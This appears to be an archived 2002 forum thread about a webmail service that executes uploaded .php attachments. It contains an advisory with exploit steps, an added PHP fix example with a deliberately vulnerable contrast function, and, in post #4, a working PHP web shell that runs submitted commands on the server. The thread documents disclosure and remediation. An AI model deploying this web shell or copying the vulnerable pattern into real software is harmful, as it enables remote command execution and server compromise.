Software Security: discussing software security algorithms, tricks, vulnerabilities
#1 | Conservative Demagogue | Join Date: Jan 2002 | Location: Caucasian Albania | Posts: 889

Armenian Freenet web-based mailer security flaw (software design bug)

VX Advisory #0002
Originally discovered by Vahram Igityan <vx@web.am> @ 20020708

DESCRIPTION
Armenian Freenet is the most popular free mail and hosting server in Armenia, and its web-based mailer is part of their free service, located at http://email.freenet.am.

OVERVIEW
Users on Armenian Freenet can execute any type of PHP code.

DETAILS
When a user views his/her attachment, it is saved on the server's disk in a unique directory and fetched by the browser, so if you attach a .php file, it will be parsed by the server.

EXPLOIT
Write code like <? phpinfo(); ?>, attach it and send it to a freenet account, then open your inbox using their web-based mailer and -=enjoy=-

SOLUTION
Rewrite the attachment-viewing part of the code: use a directory outside the DocumentRoot and show the attachment by opening and dumping the file.
---eof--
__________________ Holidays are coming... |^^^^^^^^^'''^\| ||\__ | VODKA-VODKA | ||','''|'''''''\_____,_ | _..... _ | ||_ _|'__|_____||.........| | '(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
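The SOLUTION section of the advisory describes the fix (store attachments outside DocumentRoot, then open and dump the file). The following PHP is an added example written for this page; it is not the advisory's code or Armenian Freenet's mailer. It puts a reconstruction of the pattern DETAILS describes (copy into DocumentRoot, redirect the browser) beside a handler that follows the SOLUTION. The storage layout under /var/spool/webmail, the .name sidecar file, the session handling and every function name are assumptions made for illustration.

```php
<?php
// Added example, not Armenian Freenet's code: the attachment viewer rewritten
// along the lines of the advisory's SOLUTION. Storage layout, sidecar file,
// session handling and function names are assumptions for illustration.
declare(strict_types=1);

// Assumed store: /var/spool/webmail/<user>/<msgid>/<n>.bin (+ <n>.name holding
// the original filename). This directory is NOT under Apache's DocumentRoot, so
// nothing in it can be requested by URL, let alone handed to the PHP or CGI handler.
const ATTACH_ROOT = '/var/spool/webmail';

// The pattern DETAILS describes, reconstructed for contrast: the attachment is
// written under DocumentRoot and the browser is sent to it, so the web server
// applies its handlers by extension and a .php attachment is executed, not shown.
function view_attachment_vulnerable(string $docroot, string $uniq, string $name, string $data): string
{
    @mkdir("$docroot/tmp/$uniq", 0755, true);
    file_put_contents("$docroot/tmp/$uniq/$name", $data);
    return "/tmp/$uniq/$name";   // caller redirects here: the server parses it
}

// Accept a request parameter only if it is a string of a fixed safe shape.
function query_id(array $q, string $key, string $pattern): ?string
{
    $v = $q[$key] ?? null;
    return (is_string($v) && preg_match($pattern, $v) === 1) ? $v : null;
}

// Resolve (user, msgid, n) to a real path and confirm it still lies under
// ATTACH_ROOT after symlink resolution; anything else yields null.
function attachment_path(string $user, string $msgid, int $n): ?string
{
    $root = realpath(ATTACH_ROOT);
    $real = realpath(ATTACH_ROOT . "/$user/$msgid/$n.bin");
    if ($root === false || $real === false || strpos($real, $root . '/') !== 0) {
        return null;
    }
    return $real;
}

// Reduce the stored filename to characters that cannot break the header value.
function header_filename(string $name): string
{
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($name)) ?? '';
    return $name === '' ? 'attachment' : $name;
}

function serve_attachment(string $sessionUser, array $q): void
{
    $msgid = query_id($q, 'msg', '/^[0-9]{1,12}$/');
    $n     = query_id($q, 'n',   '/^[0-9]{1,3}$/');
    if ($msgid === null || $n === null) {
        http_response_code(400);
        exit('bad request');
    }
    // The mailbox owner comes from the authenticated session, never from the
    // URL, so one user cannot point the viewer at another user's attachments.
    $path = attachment_path($sessionUser, $msgid, (int) $n);
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        exit('not found');
    }
    $nameFile = substr($path, 0, -4) . '.name';
    $orig = is_file($nameFile) ? trim((string) file_get_contents($nameFile)) : 'attachment';

    // Open and dump the file: served as an opaque download with nosniff, so the
    // browser neither renders nor guesses at an attached .html/.svg/.php either.
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . header_filename($orig) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
    exit;
}

// Entry point (session handling is hypothetical): only a logged-in user with a
// well-formed name reaches the viewer, and only for their own mailbox.
session_start();
$user = $_SESSION['user'] ?? null;
if (!is_string($user) || preg_match('/^[a-z0-9_]{1,32}$/', $user) !== 1) {
    http_response_code(403);
    exit('login required');
}
serve_attachment($user, $_GET);
```

Because the script reads the bytes and writes them to the response itself, whatever Apache would do with a given extension under DocumentRoot (.php, .cgi, .shtml) never comes into play, which also covers the CGI case raised later in the thread; the only security-relevant inputs are the session user and two digit-only identifiers, both checked before any filesystem access.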
#2 | Student | Join Date: Jun 2002 | Location: Yerevan | Posts: 258

lol. I'm just curious whether there is any attachment type at all that makes sense to display this way (I wouldn't even display HTML like that).. Nice discovery!
__________________ http://www.d-brane.com
#4 | Conservative Demagogue | Join Date: Jan 2002 | Location: Caucasian Albania | Posts: 889

And here is proof-of-concept exploit code :)
Code:
<?php
// Web-shell PoC: mailed as a .php attachment, it runs on the mail server when
// the recipient views it. The original relied on register_globals (the PHP
// default in 2002) for $ss and $cmd; reading $_REQUEST keeps the same
// behaviour on later PHP versions.
function fo() {
?>
<BODY>
<FORM>
<INPUT TYPE=TEXT NAME=cmd VALUE="ls">
<INPUT TYPE=SUBMIT NAME="ss" VALUE="bb">
</FORM>
</BODY>
<?php
}
if (!isset($_REQUEST['ss'])) {
    fo();                                  // first visit: show the command form
} else {
    echo "<PRE>\n";
    $pi = popen($_REQUEST['cmd'], "r");    // run the submitted command as the web server user
    while (!feof($pi))
        print fgets($pi, 512);
    pclose($pi);
    echo "</PRE>\n";
}
?>
#5 | Student | Join Date: Jun 2002 | Location: Yerevan | Posts: 258

Nothing else to say! Nice job! And a really funny one! I bet the fn admin doesn't read this forum, so this thing will stay available for a long time..
#6 | Schoolboy | Join Date: Apr 2002 | Location: Vanadzor | Posts: 227

To VX: whenever you find something this serious, tell the sysadmin first; otherwise, right now there are thousands of users on fn, one of them loses his conscience and .... In short, well done!!! But be sure to tell the admin first, if of course you haven't told him already.
#7 | Conservative Demagogue | Join Date: Jan 2002 | Location: Caucasian Albania | Posts: 889

Quote:
But I got no answer.
#8 | Conservative Demagogue | Join Date: Jan 2002 | Location: Caucasian Albania | Posts: 889

The admin replied... He's a very nice person.
#9 | Student | Join Date: Jun 2002 | Location: Yerevan | Posts: 258

Hmm.. I don't know how to put it into words, but this is something.. ANY file that it knows how to run, the mailer runs inside itself; that includes php, cgi (there are small problems with privileges there, but that's nothing), asp and so on.. It's simply a nightmare! Plus, for unknown reasons it renames files without an extension to file.txt, and in general it works just amazingly. To VX: I hope Tigran understood all this.. He should shut down the web-email entirely until he fixes it, if freenet or his job is dear to him.
#10 | Student | Join Date: Jun 2002 | Location: Yerevan | Posts: 258

To VX: So Tigran sort of "closed" php and left everything else?? Interesting person. By the way, regarding asp I apparently didn't look properly; it doesn't seem to understand it, but it doesn't show .c files either; again it evidently tries to run them itself and doesn't get the privileges (similar to cgi).
#11 | Conservative Demagogue | Join Date: Jan 2002 | Location: Caucasian Albania | Posts: 889

YES, that is exactly what he closed. At least now they won't be able to break in "brazenly".